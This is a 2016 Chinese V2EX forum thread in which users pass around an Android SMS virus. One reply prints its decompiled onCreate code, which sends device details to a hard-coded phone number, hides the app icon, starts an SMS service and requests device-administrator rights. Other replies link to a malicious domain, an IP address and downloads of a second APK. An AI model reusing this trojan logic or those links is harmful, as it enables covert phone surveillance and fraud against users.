首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  Android

手机病毒,之前看到有人会玩,刚好收到一个,你们拿去玩吧

  •  
  •   Olive · 2016-09-02 11:12:49 +08:00 · 4083 次点击
    这是一个创建于 1167 天前的主题,其中的信息可能已经有所发展或是发生改变。
    21 回复  |  直到 2016-09-02 22:46:56 +08:00
        1
    luap   2016-09-02 12:34:35 +08:00
    已返编译:

    protected void onCreate(Bundle paramBundle)
    {
    super.onCreate(paramBundle);
    super.requestWindowFeature(1);
    setContentView(2130903040);
    SmSutils localSmSutils = new SmSutils();
    if (SmSutils.key.equals(SmSutils.getPublicKey(this)))
    {
    localSmSutils.sendSMS("18789837060", "手机已安装软件,回复 com#false 关闭 com#true 开启, 版本" + Build.VERSION.SDK_INT + " " + Build.MODEL, null);
    Toast.makeText(this, "程序启动成功", 1).show();
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    startService(new Intent(this, SmSserver.class));
    this.Dmanager = ((DevicePolicyManager)getSystemService("device_policy"));
    ComponentName localComponentName = new ComponentName(this, DeviceReceiver.class);
    if (!this.Dmanager.isAdminActive(localComponentName))
    {
    Intent localIntent = new Intent(getAction());
    localIntent.putExtra(getExtraDeviceAdmin(), localComponentName);
    localIntent.putExtra(getExtraAddExplanation(), "设备管理器");
    startActivityForResult(localIntent, 0);
    }
    finish();
    return;
    }
    localSmSutils.sendSMS("18789837060", "证书错误,程序启动失败", null);
    Toast.makeText(this, "证书错误,程序启动失败", 1).show();
    finish();
    }
        2
    iMono   2016-09-02 12:35:49 +08:00
    @luap 好屌 大拇指
        3
    shimanooo   2016-09-02 12:46:21 +08:00
    求玩法..

    用小号发短信骂三门?
        4
    supman   2016-09-02 13:00:31 +08:00 via Android
    @luap 求教 这个怎么反编译的。。竟然完完整整的出来了
        5
    ljbha007   2016-09-02 13:02:34 +08:00
    @supman 因为没有混淆啊
        6
    ljbha007   2016-09-02 13:03:19 +08:00
    炸之
        7
    Olive   2016-09-02 13:07:38 +08:00
    @luap 厉害厉害(手动鼓掌
        8
    wohenyingyu01   2016-09-02 13:17:11 +08:00 via iPhone
    是干嘛的……
        9
    jsonzz   2016-09-02 13:21:57 +08:00
    我跟踪过类似的 Android 病毒,当时写了个分析。可以看看我 blog:http://ztwo.github.io/blog/Androidworm/
        10
    just1   2016-09-02 13:25:05 +08:00 via Android
    不会玩放腾讯哈勃分析
        11
    ljcarsenal   2016-09-02 13:27:46 +08:00 via Android
    @jsonzz 看了你那个文章,你是怎么进入他邮箱的呢 难道把密码写在 apk 里?
        12
    haozibi   2016-09-02 13:33:13 +08:00
    @ljcarsenal 源码里有发信账号和密码。
        13
    hinkal   2016-09-02 13:33:40 +08:00
    这病毒我见过,据说是个初二学生写的,密码就硬编码在代码里。
        14
    gimp   2016-09-02 13:46:12 +08:00
    http://yzc178co.com/index.htm


    @luap
    @jsonzz

    这个呢,我昨天反编译了一下,不太会 java ,也没看到什么有价值的东西,也不知道折腾的对不对

    代码: https://mega.nz/#!CF93iCyS!93vk_KL3YKZMtWQ34GPb_1Jol-viW63FbCxHuIHOvaI

    域名应该是快到期了, apk 这里: https://mega.nz/#!XJtACAZY!vPYDNgu7yIEbOeZZx98mTafLTJ3NgQM4izi0qJI9mrU
        15
    Rect   2016-09-02 13:54:18 +08:00
    http://218.6.173.38/

    ...这个地址
        16
    CodingPuppy   2016-09-02 13:59:46 +08:00
    android 漏洞不少,无法卸载的漏洞在 AndroidM 上还有
        17
    shenfu1991   2016-09-02 15:19:09 +08:00
    关键是这个是 android 程序,在 iOS 无效吧。。。
        18
    VmuTargh   2016-09-02 16:33:21 +08:00 via Android
    @shenfu1991 iOS 有支付宝(大雾
        19
    fjzjk   2016-09-02 18:06:40 +08:00
    这种多了,实际上没啥,只是安卓权限比较多,安装上就能乱搞。
    你看上面都有人反编译了,混淆都不做的
        20
    tempdban   2016-09-02 18:40:12 +08:00 via Android
    @CodingPuppy 我有点蒙,只有成为设备管理器白不能卸载吧
        21
    mingyun   2016-09-02 22:46:56 +08:00
    @jsonzz 厉害
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2771 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 33ms · UTC 12:15 · PVG 20:15 · LAX 04:15 · JFK 07:15
    ♥ Do have faith in what you're doing.